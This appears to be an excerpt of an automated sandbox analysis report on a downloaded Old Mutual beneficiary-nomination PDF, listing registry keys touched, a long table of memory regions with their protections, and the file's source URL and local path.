HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
UID
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
Public
HKEY_CURRENT_USER\SOFTWARE\SoftwareClient
Private
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fWindowsOnlyEOL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fPasteOriginalEOL
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fReverse
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fWrapAround
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Notepad
fMatchCase
There are 30 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1998EC60000
trusted library allocation
page read and write
C9B909A000
stack
page read and write
1998ED19000
heap
page read and write
2021BBAB000
heap
page read and write
7AC82FE000
stack
page read and write
BF1000
unkown
page execute read
2641853A000
heap
page read and write
7FFB226C6000
unkown
page readonly
128FDFE000
unkown
page readonly
22844426000
heap
page read and write
2021BB4A000
heap
page read and write
11E73580000
heap
page read and write
264186D0000
trusted library allocation
page read and write
11E71B85000
heap
page read and write
123D66F0000
heap
page read and write
11E73600000
heap
page read and write
11E71B7E000
heap
page read and write
1998F434000
heap
page read and write
142868A0000
heap
page read and write
2284CAC0000
heap
page read and write
228445C0000
trusted library allocation
page read and write
7987AFE000
stack
page read and write
7FFB27C61000
unkown
page execute read
1428BDD2000
trusted library allocation
page read and write
2740CC95000
heap
page read and write
7FFB16790000
unkown
page readonly
A970000
heap
page read and write
27A55A05000
heap
page read and write
142868FF000
heap
page read and write
1428C055000
heap
page read and write
1998F437000
heap
page read and write
128F7FE000
unkown
page readonly
123D6DF8000
heap
page read and write
2740CCAE000
heap
page read and write
1428BDD0000
trusted library allocation
page read and write
14286840000
heap
page read and write
22844B37000
heap
page read and write
27A5581D000
heap
page read and write
123D68B0000
heap
page read and write
B37E000
heap
page read and write
11E71BCA000
heap
page read and write
CAE000
unkown
page readonly
11E73665000
heap
page read and write
7B0000
heap
page read and write
26418555000
heap
page read and write
AAB4000
heap
page read and write
A960000
trusted library allocation
page read and write
7FFB167B0000
unkown
page read and write
123D6650000
heap
page read and write
2740CC94000
heap
page read and write
2740CC92000
heap
page read and write
11E71BA3000
heap
page read and write
BEC6000
heap
page read and write
2740CCD8000
heap
page read and write
2740CDA0000
trusted library allocation
page read and write
2284466A000
heap
page read and write
123D6570000
heap
page read and write
8CE067F000
stack
page read and write
7FFB226B1000
unkown
page execute read
11E71B76000
heap
page read and write
2284CC4A000
heap
page read and write
B47000
heap
page read and write
26418C5A000
heap
page read and write
79AB47F000
stack
page read and write
B379000
heap
page read and write
14286895000
heap
page read and write
11E71BCA000
heap
page read and write
1998ED2F000
heap
page read and write
28C3000
heap
page read and write
A871000
heap
page read and write
7FFB27C61000
unkown
page execute read
123D6707000
heap
page read and write
2740D277000
heap
page read and write
26418C54000
heap
page read and write
1428C059000
heap
page read and write
798710A000
stack
page read and write
14286AF0000
heap
page read and write
7FFB226D5000
unkown
page readonly
2021BB6E000
heap
page read and write
CAE000
unkown
page readonly
2284CC45000
heap
page read and write
2284CA60000
heap
page read and write
BD80000
trusted library allocation
page read and write
142867F0000
heap
page read and write
2284CC40000
heap
page read and write
D3D48FF000
stack
page read and write
CA6000
unkown
page write copy
11E71BD7000
heap
page read and write
2021BDA5000
heap
page read and write
28C6000
heap
page read and write
128F6FE000
stack
page read and write
C8C9000
heap
page read and write
B371000
heap
page read and write
2284CA80000
trusted library allocation
page read and write
20100FF000
stack
page read and write
7FFB226C6000
unkown
page readonly
1998ECE7000
heap
page read and write
1428BE00000
trusted library allocation
page read and write
2469276B000
heap
page read and write
A871000
heap
page read and write
14287980000
trusted library section
page readonly
11E71BCA000
heap
page read and write
26418555000
heap
page read and write
BE78D07000
stack
page read and write
123D6DF7000
heap
page read and write
C9B957F000
stack
page read and write
AAB4000
heap
page read and write
11E71B7E000
heap
page read and write
14287640000
trusted library allocation
page read and write
2284442B000
heap
page read and write
2284442B000
heap
page read and write
128F9FE000
unkown
page readonly
1428C062000
heap
page read and write
27A557B1000
heap
page read and write
B6A5000
heap
page read and write
26418C57000
heap
page read and write
1428BEA0000
trusted library allocation
page read and write
2740D278000
heap
page read and write
14286A10000
heap
page read and write
345B000
heap
page read and write
1428BD50000
trusted library allocation
page read and write
1998ECF9000
heap
page read and write
2740CCDA000
heap
page read and write
8CE019A000
stack
page read and write
27A556F0000
heap
page read and write
2740CC70000
trusted library allocation
page read and write
2740CC9E000
heap
page read and write
1428BE14000
trusted library allocation
page read and write
2021BB17000
heap
page read and write
CAE000
unkown
page readonly
425D7F000
stack
page read and write
2284CC4A000
heap
page read and write
A431000
heap
page read and write
1998ED31000
heap
page read and write
11E71BD7000
heap
page read and write
2284C960000
heap
page read and write
11E71BCE000
heap
page read and write
2284CC4E000
heap
page read and write
123D6E04000
heap
page read and write
3220000
heap
page read and write
1428BDC0000
trusted library allocation
page read and write
22844427000
heap
page read and write
128F8FB000
stack
page read and write
228443C0000
trusted library allocation
page read and write
1428BE10000
trusted library allocation
page read and write
24AD000
stack
page read and write
2284CC4E000
heap
page read and write
2740CC9E000
heap
page read and write
1998ED35000
heap
page read and write
2021BB18000
heap
page read and write
8FF000
heap
page read and write
7FFB226B1000
unkown
page execute read
1428C10C000
heap
page read and write
BF1000
unkown
page execute read
7FFB226B1000
unkown
page execute read
79AB2FF000
stack
page read and write
ACAE000
heap
page read and write
359C000
heap
page read and write
1428688E000
heap
page read and write
1998F447000
heap
page read and write
123D6965000
heap
page read and write
425918000
stack
page read and write
14286878000
heap
page read and write
26418500000
heap
page read and write
2021BAE0000
heap
page read and write
C0B6000
heap
page read and write
123D6729000
heap
page read and write
7FFB226D0000
unkown
page read and write
1428C0EE000
heap
page read and write
26418C5B000
heap
page read and write
123D6E02000
heap
page read and write
2284CB14000
heap
page read and write
2740CCF1000
heap
page read and write
ACA5000
heap
page read and write
2C20000
heap
page read and write
1428C105000
heap
page read and write
7FFB226B1000
unkown
page execute read
11E75DB0000
heap
page read and write
26418547000
heap
page read and write
11E73603000
heap
page read and write
BF0000
unkown
page readonly
1428C110000
heap
page read and write
1428C0BE000
heap
page read and write
8CE057F000
stack
page read and write
2021BB32000
heap
page read and write
1998ED33000
heap
page read and write
11E71BD9000
heap
page read and write
11E71BD5000
heap
page read and write
2284CAD7000
heap
page read and write
11E73660000
heap
page read and write
22844426000
heap
page read and write
2740CCF1000
heap
page read and write
11E73560000
trusted library allocation
page read and write
128FCFB000
stack
page read and write
2284D1A2000
heap
page read and write
3470000
heap
page read and write
200FD8E000
stack
page read and write
2740D250000
heap
page read and write
BF0000
unkown
page readonly
2740CCDC000
heap
page read and write
C0B0000
trusted library allocation
page read and write
128F5FE000
unkown
page readonly
129107E000
stack
page read and write
12908FE000
unkown
page readonly
11E71B86000
heap
page read and write
22844664000
heap
page read and write
1998F43E000
heap
page read and write
128FEFE000
unkown
page readonly
1428BF20000
trusted library allocation
page read and write
246942C0000
heap
page read and write
22844426000
heap
page read and write
123D6741000
heap
page read and write
7FFB226B0000
unkown
page readonly
24692985000
heap
page read and write
2284D1A2000
heap
page read and write
26418C53000
heap
page read and write
128EF3B000
stack
page read and write
2D00000
heap
page read and write
ACAC000
heap
page read and write
1998EC60000
trusted library allocation
page read and write
3570000
heap
page read and write
2740CCB2000
heap
page read and write
2740CF00000
heap
page read and write
12907F9000
stack
page read and write
BE7917E000
stack
page read and write
228443C0000
trusted library allocation
page read and write
1428C042000
heap
page read and write
A97A000
heap
page read and write
1428C117000
heap
page read and write
2284D1A4000
heap
page read and write
A861000
heap
page read and write
264186F0000
heap
page read and write
2641855E000
heap
page read and write
142868B4000
heap
page read and write
11E71BF6000
heap
page read and write
B4B5000
heap
page read and write
8CE047E000
stack
page read and write
11E7366C000
heap
page read and write
1428682B000
heap
page read and write
C7B000
unkown
page readonly
1998F44C000
heap
page read and write
ACA0000
heap
page read and write
902000
heap
page read and write
1428710C000
heap
page read and write
11E755B0000
trusted library allocation
page read and write
2284CC4B000
heap
page read and write
26418C6C000
heap
page read and write
11E71BCE000
heap
page read and write
69C000
stack
page read and write
22844667000
heap
page read and write
7FFB226B0000
unkown
page readonly
14287113000
heap
page read and write
2284D190000
heap
page read and write
2284440B000
heap
page read and write
1428C01F000
heap
page read and write
AAB8000
heap
page read and write
1998EC40000
heap
page read and write
B6AA000
heap
page read and write
8CE04FE000
stack
page read and write
2284CD00000
heap
page read and write
2740CCE1000
heap
page read and write
1428C0FA000
heap
page read and write
123D6737000
heap
page read and write
129017E000
stack
page read and write
A671000
heap
page read and write
7FFB226D2000
unkown
page readonly
ACA9000
heap
page read and write
14287301000
trusted library allocation
page read and write
11E71BD5000
heap
page read and write
2740CC9A000
heap
page read and write
4430000
heap
page read and write
425CFE000
stack
page read and write
2021BB6E000
heap
page read and write
26418C72000
heap
page read and write
11E71BD7000
heap
page read and write
2284CB15000
heap
page read and write
26418514000
heap
page read and write
264184F0000
trusted library allocation
page read and write
2021BB11000
heap
page read and write
1428BF70000
remote allocation
page read and write
11E71BD5000
heap
page read and write
2740CC97000
heap
page read and write
123D6690000
trusted library allocation
page read and write
1998ED31000
heap
page read and write
129057E000
stack
page read and write
22844665000
heap
page read and write
7FFB226D0000
unkown
page read and write
79878FF000
stack
page read and write
1998ED19000
heap
page read and write
26418740000
heap
page read and write
7FFB27C80000
unkown
page read and write
33B0000
heap
page read and write
C9B94FF000
stack
page read and write
25AD000
stack
page read and write
7FFB226D2000
unkown
page readonly
B376000
heap
page read and write
BF0000
unkown
page readonly
2740CCB7000
heap
page read and write
11E71B48000
heap
page read and write
2021BBE0000
heap
page read and write
128F4F7000
stack
page read and write
29A0000
heap
page read and write
2284CA80000
trusted library allocation
page read and write
2740CC9A000
heap
page read and write
2740D282000
heap
page read and write
228445E0000
heap
page read and write
1998ECF9000
heap
page read and write
C9B947F000
stack
page read and write
B6AC000
heap
page read and write
26418C5E000
heap
page read and write
1998ED1A000
heap
page read and write
BE7907E000
stack
page read and write
1428C0DD000
heap
page read and write
11E71BCA000
heap
page read and write
22844B38000
heap
page read and write
123D6736000
heap
page read and write
7987CFF000
stack
page read and write
123D68BA000
heap
page read and write
27A55A00000
heap
page read and write
79AB27A000
stack
page read and write
246926D0000
heap
page read and write
2021BB2D000
heap
page read and write
1428C114000
heap
page read and write
12910FE000
unkown
page readonly
2021BAF2000
heap
page read and write
11E71BC1000
heap
page read and write
A8BC000
heap
page read and write
1428BDD4000
trusted library allocation
page read and write
2284CA40000
heap
page read and write
123D66F9000
heap
page read and write
2284CC47000
heap
page read and write
2740CC90000
heap
page read and write
A976000
heap
page read and write
1428BDD1000
trusted library allocation
page read and write
2021BB0A000
heap
page read and write
1998F435000
heap
page read and write
C8C6000
heap
page read and write
2284CAFB000
heap
page read and write
1428BF00000
trusted library allocation
page read and write
26418745000
heap
page read and write
128FAFB000
stack
page read and write
7EA000
heap
page read and write
B6AE000
heap
page read and write
228443D0000
heap
page read and write
2641853D000
heap
page read and write
14286813000
heap
page read and write
2740CC50000
heap
page read and write
C9B911F000
stack
page read and write
22844423000
heap
page read and write
22844423000
heap
page read and write
1428C04F000
heap
page read and write
2740CC9A000
heap
page read and write
14287D40000
trusted library allocation
page read and write
26418C57000
heap
page read and write
2740CCF8000
heap
page read and write
1998F433000
heap
page read and write
2284D19C000
heap
page read and write
12903FE000
unkown
page readonly
11E71BF6000
heap
page read and write
28C0000
heap
page read and write
12906FE000
unkown
page readonly
228446AA000
heap
page read and write
1428C000000
heap
page read and write
3475000
heap
page read and write
1998F437000
heap
page read and write
11E71BD7000
heap
page read and write
26418546000
heap
page read and write
7FFB27C76000
unkown
page readonly
1998EC90000
heap
page read and write
1998EF7A000
heap
page read and write
2284442B000
heap
page read and write
1998F43E000
heap
page read and write
28A0000
heap
page read and write
22844B30000
heap
page read and write
142879C0000
trusted library section
page readonly
1428BF70000
remote allocation
page read and write
11E71BD6000
heap
page read and write
123D6707000
heap
page read and write
14286890000
heap
page read and write
35B5000
heap
page read and write
2740CCF8000
heap
page read and write
26418555000
heap
page read and write
D2D0000
trusted library allocation
page read and write
7FFB167B2000
unkown
page readonly
2284466B000
heap
page read and write
AABC000
heap
page read and write
2740CCD9000
heap
page read and write
14286F90000
trusted library section
page read and write
1428BEA0000
trusted library allocation
page read and write
1428C0BC000
heap
page read and write
14287015000
heap
page read and write
1998EC60000
trusted library allocation
page read and write
123D672A000
heap
page read and write
142879B0000
trusted library section
page readonly
BE7927F000
stack
page read and write
123D68B5000
heap
page read and write
27A55788000
heap
page read and write
36B0000
heap
page read and write
2284CAF5000
heap
page read and write
7FFB27C60000
unkown
page readonly
11E71BD9000
heap
page read and write
2284CAF6000
heap
page read and write
D3D459A000
stack
page read and write
1428BE29000
trusted library allocation
page read and write
2284CB00000
heap
page read and write
BE792FB000
stack
page read and write
2641853B000
heap
page read and write
12904FE000
unkown
page readonly
14287102000
heap
page read and write
123D68BA000
heap
page read and write
2284CB00000
heap
page read and write
D3D49FF000
stack
page read and write
3590000
heap
page read and write
1998EEE0000
heap
page read and write
1998F430000
heap
page read and write
79874FE000
stack
page read and write
2740CF05000
heap
page read and write
2740CCA9000
heap
page read and write
123D6731000
heap
page read and write
79AB3FE000
stack
page read and write
2021B9F0000
heap
page read and write
2021BB34000
heap
page read and write
1998EC10000
heap
page read and write
65B000
stack
page read and write
2284CAD3000
heap
page read and write
2284CB20000
heap
page read and write
142868AF000
heap
page read and write
BE791FE000
stack
page read and write
201017E000
stack
page read and write
27A556D0000
heap
page read and write
11E71BCA000
heap
page read and write
123D68B7000
heap
page read and write
3450000
heap
page read and write
B4BC000
heap
page read and write
1428BE10000
trusted library allocation
page read and write
351E000
stack
page read and write
1998EC60000
trusted library allocation
page read and write
BD7000
heap
page read and write
2284CB28000
heap
page read and write
B37A000
heap
page read and write
915000
heap
page read and write
264184A0000
heap
page read and write
BD8D000
heap
page read and write
228445A0000
heap
page read and write
2284442B000
heap
page read and write
2284466A000
heap
page read and write
30FD000
stack
page read and write
11E71BA3000
heap
page read and write
11E71B7C000
heap
page read and write
1428C10A000
heap
page read and write
2284CAC9000
heap
page read and write
22844B3C000
heap
page read and write
8CE05FF000
stack
page read and write
2021DA70000
heap
page read and write
123D87F0000
heap
page read and write
2740CB50000
heap
page read and write
14286800000
heap
page read and write
7FFB226D0000
unkown
page read and write
CA6000
unkown
page write copy
11E71BD5000
heap
page read and write
1998ED3C000
heap
page read and write
14286902000
heap
page read and write
123D6744000
heap
page read and write
123D68B4000
heap
page read and write
1428BF70000
remote allocation
page read and write
228445C0000
trusted library allocation
page read and write
378F000
unkown
page read and write
C78D000
heap
page read and write
123D68BE000
heap
page read and write
2284466E000
heap
page read and write
33BF000
unkown
page read and write
22844409000
heap
page read and write
1428C090000
heap
page read and write
123D6690000
trusted library allocation
page read and write
7FFB226B0000
unkown
page readonly
7FFB167B5000
unkown
page readonly
7FFB27C85000
unkown
page readonly
27A55780000
heap
page read and write
200FC8A000
stack
page read and write
7AC837F000
stack
page read and write
2021BB11000
heap
page read and write
2740CDA0000
trusted library allocation
page read and write
22844407000
heap
page read and write
1998ED31000
heap
page read and write
2740EB20000
heap
page read and write
11E71BDF000
heap
page read and write
11E71BCE000
heap
page read and write
22844430000
heap
page read and write
22844426000
heap
page read and write
12905FE000
unkown
page readonly
1428BDF0000
trusted library allocation
page read and write
11E71AC0000
heap
page read and write
123D6747000
heap
page read and write
22846560000
heap
page read and write
7FFB226D0000
unkown
page read and write
246926B0000
heap
page read and write
129047E000
stack
page read and write
123D68B2000
heap
page read and write
123D6690000
trusted library allocation
page read and write
22844660000
heap
page read and write
2641855A000
heap
page read and write
7987BFE000
stack
page read and write
2740D284000
heap
page read and write
26418C60000
heap
page read and write
7FFB167A6000
unkown
page readonly
ACAA000
heap
page read and write
2284CC4A000
heap
page read and write
11E71AD0000
heap
page read and write
22844B44000
heap
page read and write
2641853A000
heap
page read and write
123D6E02000
heap
page read and write
7E0000
heap
page read and write
228446A5000
heap
page read and write
1998EF70000
heap
page read and write
264186D0000
trusted library allocation
page read and write
2740CC93000
heap
page read and write
7AC7FCB000
stack
page read and write
34CE000
unkown
page read and write
11E71BE1000
heap
page read and write
123D6731000
heap
page read and write
1998ED31000
heap
page read and write
2D9D000
stack
page read and write
7FFB27C82000
unkown
page readonly
2284466A000
heap
page read and write
BEC9000
heap
page read and write
B4BC000
heap
page read and write
7FFB27C76000
unkown
page readonly
123D6960000
heap
page read and write
26418C5A000
heap
page read and write
128FE7E000
stack
page read and write
27A57660000
heap
page read and write
22844423000
heap
page read and write
1428711A000
heap
page read and write
26418C5E000
heap
page read and write
11E71BCA000
heap
page read and write
2284CA80000
trusted library allocation
page read and write
11E71BD7000
heap
page read and write
200FD0E000
stack
page read and write
22844663000
heap
page read and write
128FFFE000
unkown
page readonly
32B0000
heap
page read and write
7FFB27C82000
unkown
page readonly
7AC827E000
stack
page read and write
2740CF0A000
heap
page read and write
11E71B10000
heap
page read and write
228443E7000
heap
page read and write
BE78D8E000
stack
page read and write
11E71BD5000
heap
page read and write
323D000
stack
page read and write
B6A0000
heap
page read and write
79875FE000
stack
page read and write
1428687D000
heap
page read and write
22844B42000
heap
page read and write
11E71BCE000
heap
page read and write
1998ECF4000
heap
page read and write
33A0000
heap
page read and write
14286929000
heap
page read and write
A770000
trusted library allocation
page read and write
26418537000
heap
page read and write
79877FF000
stack
page read and write
14287000000
heap
page read and write
11E71BD7000
heap
page read and write
1998ED19000
heap
page read and write
2740CC9B000
heap
page read and write
14287970000
trusted library section
page readonly
321E000
unkown
page read and write
AABC000
heap
page read and write
228443A0000
heap
page read and write
2740D270000
heap
page read and write
2284CAD2000
heap
page read and write
914000
heap
page read and write
11E71BCE000
heap
page read and write
123D68B3000
heap
page read and write
1428BEB0000
trusted library allocation
page read and write
1428BF30000
trusted library allocation
page read and write
2641853A000
heap
page read and write
28AC000
heap
page read and write
1998F43A000
heap
page read and write
1428C0C4000
heap
page read and write
26418C67000
heap
page read and write
2284CD0A000
heap
page read and write
C57814F000
stack
page read and write
333D000
stack
page read and write
1428BF20000
trusted library allocation
page read and write
123D6752000
heap
page read and write
2740CD01000
heap
page read and write
12909FC000
stack
page read and write
1998F454000
heap
page read and write
1428BF10000
trusted library allocation
page read and write
C9B919F000
stack
page read and write
2284CAD7000
heap
page read and write
14287100000
heap
page read and write
11E71BCA000
heap
page read and write
B4B8000
heap
page read and write
22844415000
heap
page read and write
14287890000
trusted library allocation
page read and write
2740CCF1000
heap
page read and write
7FFB226C6000
unkown
page readonly
129067E000
stack
page read and write
26418C50000
heap
page read and write
C7B000
unkown
page readonly
2740CCE1000
heap
page read and write
123D6703000
heap
page read and write
A97E000
heap
page read and write
1290AFE000
unkown
page readonly
123D68BA000
heap
page read and write
1428BDD0000
trusted library allocation
page read and write
D3D497F000
stack
page read and write
ACA5000
heap
page read and write
228443D8000
heap
page read and write
12900FE000
unkown
page readonly
BF1000
unkown
page execute read
123D68BE000
heap
page read and write
425DFF000
stack
page read and write
2021BB31000
heap
page read and write
364F000
stack
page read and write
2800000
heap
page read and write
264184B0000
heap
page read and write
142879A0000
trusted library section
page readonly
2021BB09000
heap
page read and write
22844423000
heap
page read and write
34D0000
heap
page read and write
24692740000
heap
page read and write
2641A6D0000
heap
page read and write
2284CB00000
heap
page read and write
BEC0000
trusted library allocation
page read and write
26418C55000
heap
page read and write
11E71BCE000
heap
page read and write
7FFB226B0000
unkown
page readonly
123D6690000
trusted library allocation
page read and write
1998F432000
heap
page read and write
11E71BD5000
heap
page read and write
27A557F5000
heap
page read and write
1428C0FF000
heap
page read and write
2284CC43000
heap
page read and write
129007E000
stack
page read and write
3100000
heap
page read and write
7FFB16791000
unkown
page execute read
123D6670000
heap
page read and write
1428BD40000
trusted library allocation
page read and write
2284CC44000
heap
page read and write
246926A0000
heap
page read and write
11E71BDF000
heap
page read and write
264184D0000
heap
page read and write
2740CCF3000
heap
page read and write
2021BC00000
heap
page read and write
11E71B64000
heap
page read and write
2740CCF6000
heap
page read and write
26418C52000
heap
page read and write
123D6731000
heap
page read and write
326E000
stack
page read and write
2740D27C000
heap
page read and write
11E71B7B000
heap
page read and write
26418536000
heap
page read and write
2284CD05000
heap
page read and write
11E71BCA000
heap
page read and write
11E71B7F000
heap
page read and write
22844408000
heap
page read and write
11E71BD7000
heap
page read and write
1998EF75000
heap
page read and write
2740CCF1000
heap
page read and write
2284466E000
heap
page read and write
22844B42000
heap
page read and write
2021BBAD000
heap
page read and write
7FFB226D5000
unkown
page readonly
11E71BD6000
heap
page read and write
2021D720000
heap
page read and write
1998F43A000
heap
page read and write
CA6000
unkown
page write copy
2740CCA0000
heap
page read and write
201007F000
stack
page read and write
228446A0000
heap
page read and write
1428C08D000
heap
page read and write
7FFB226D5000
unkown
page readonly
14286873000
heap
page read and write
2284CBC0000
heap
page read and write
2740CC30000
heap
page read and write
2021BB4A000
heap
page read and write
700000
heap
page read and write
2890000
heap
page read and write
2641853A000
heap
page read and write
11E71BCE000
heap
page read and write
14286F80000
trusted library allocation
page read and write
7AC847F000
stack
page read and write
AAB5000
heap
page read and write
7FFB27C80000
unkown
page read and write
27A557F4000
heap
page read and write
123D6DF0000
heap
page read and write
123D696A000
heap
page read and write
22844414000
heap
page read and write
1428711B000
heap
page read and write
26418567000
heap
page read and write
2740CC70000
trusted library allocation
page read and write
914000
heap
page read and write
2284D197000
heap
page read and write
7987DFB000
stack
page read and write
2021BB6E000
heap
page read and write
123D66C0000
heap
page read and write
2284CC20000
heap
page read and write
1428C02C000
heap
page read and write
2284CA80000
trusted library allocation
page read and write
79AB4FF000
stack
page read and write
B370000
heap
page read and write
1428711A000
heap
page read and write
A971000
heap
page read and write
14287002000
heap
page read and write
22844662000
heap
page read and write
26418561000
heap
page read and write
1998ECE0000
heap
page read and write
1998F448000
heap
page read and write
14287D11000
trusted library allocation
page read and write
22844667000
heap
page read and write
228443E7000
heap
page read and write
24692748000
heap
page read and write
2740D282000
heap
page read and write
2021BB4A000
heap
page read and write
1428685B000
heap
page read and write
1998F43B000
heap
page read and write
1998F452000
heap
page read and write
35B0000
heap
page read and write
123D6DFC000
heap
page read and write
12902FA000
stack
page read and write
B6A5000
heap
page read and write
123D68BB000
heap
page read and write
11E71BE1000
heap
page read and write
2740CCE1000
heap
page read and write
710000
heap
page read and write
22844390000
heap
page read and write
2284CAFA000
heap
page read and write
7FFB226D2000
unkown
page readonly
1998F440000
heap
page read and write
C5780CB000
stack
page read and write
11E71BD5000
heap
page read and write
1428BDB0000
trusted library allocation
page read and write
26418C5A000
heap
page read and write
123D6702000
heap
page read and write
2284D198000
heap
page read and write
1998EC20000
heap
page read and write
2641874A000
heap
page read and write
12901FE000
unkown
page readonly
2021BDA0000
heap
page read and write
BE790FD000
stack
page read and write
26418C74000
heap
page read and write
26418555000
heap
page read and write
11E71B7F000
heap
page read and write
142868A4000
heap
page read and write
123D68B7000
heap
page read and write
388F000
stack
page read and write
1428BE00000
trusted library allocation
page read and write
128FBFE000
unkown
page readonly
7FFB226D5000
unkown
page readonly
A530000
trusted library allocation
page read and write
C7B000
unkown
page readonly
264184F0000
trusted library allocation
page read and write
26418557000
heap
page read and write
7FFB226C6000
unkown
page readonly
D3D4A7F000
stack
page read and write
7AC83FE000
stack
page read and write
26418C72000
heap
page read and write
1998ED1C000
heap
page read and write
228443E2000
heap
page read and write
11E71B9B000
heap
page read and write
11E71B7E000
heap
page read and write
14287990000
trusted library section
page readonly
A979000
heap
page read and write
7FFB27C60000
unkown
page readonly
2284CC42000
heap
page read and write
14286913000
heap
page read and write
128FF7E000
stack
page read and write
1428C0F7000
heap
page read and write
26418C68000
heap
page read and write
1998F43A000
heap
page read and write
2641855F000
heap
page read and write
D3D487E000
stack
page read and write
2284442B000
heap
page read and write
767000
heap
page read and write
A973000
heap
page read and write
1428D000000
heap
page read and write
11E71B40000
heap
page read and write
11E71BCE000
heap
page read and write
24692980000
heap
page read and write
1998ED19000
heap
page read and write
123D6742000
heap
page read and write
79AB37F000
stack
page read and write
27A556C0000
heap
page read and write
26418519000
heap
page read and write
2740CC97000
heap
page read and write
2284CC47000
heap
page read and write
7FFB226D2000
unkown
page readonly
7FFB27C85000
unkown
page readonly
There are 780 hidden memdumps, click here to show them.

DOM / HTML

URL
Malicious
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
file:///C:/Users/user/Downloads/downloaded.pdf
file:///C:/Users/user/Downloads/downloaded.pdf